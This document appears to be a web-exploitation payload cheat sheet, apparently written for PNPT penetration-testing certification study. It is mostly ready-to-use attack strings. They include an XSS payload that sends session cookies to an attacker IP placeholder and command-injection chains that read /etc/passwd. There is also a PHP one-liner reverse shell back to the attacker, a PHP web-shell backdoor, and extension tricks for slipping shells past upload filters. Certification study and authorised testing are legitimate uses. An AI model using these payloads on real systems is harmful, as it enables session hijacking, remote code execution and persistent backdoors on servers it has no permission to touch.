Cross-Site Scripting (XSS) - Cookie Stealing
Exfiltrate a user’s session cookie to a remote server using a script tag.
<script>var i = new Image;i.src="http://{{attacker_ip}}?"+document.cookie;</script>XSS - Image Error Trigger
Use the onerror attribute of an image tag to execute JavaScript when the image fails to load.
<img src=x onerror="alert(document.cookie)">Command Injection - Basic Chaining
Chain multiple commands together using logical operators or separators.
{{input}}; whoami
{{input}} && ls -la
{{input}} | cat /etc/passwdCommand Injection - Reverse Shell (PHP)
Execute a PHP one-liner to establish a reverse shell back to the attacker machine.
; php -r '$sock=fsockopen("{{attacker_ip}}",{{port}});exec("/bin/sh -i <&3 >&3 2>&3");' ;Insecure File Upload - PHP Shell
Upload a simple PHP backdoor to execute commands on the server.
<?php system($_GET['cmd']); ?>Insecure File Upload - Bypass Techniques
Rename the shell extension or use double extensions to bypass simple filters.
shell.php.png
shell.phtml
shell.php5
shell.jpg (with PHP code inside)Description
Web exploitation involves identifying and leveraging vulnerabilities in web applications to gain unauthorized access or execute arbitrary code. In PNPT, key techniques include Cross-Site Scripting (XSS) for user impersonation, Command Injection for server-side code execution, and Insecure File Upload for establishing persistent backdoors.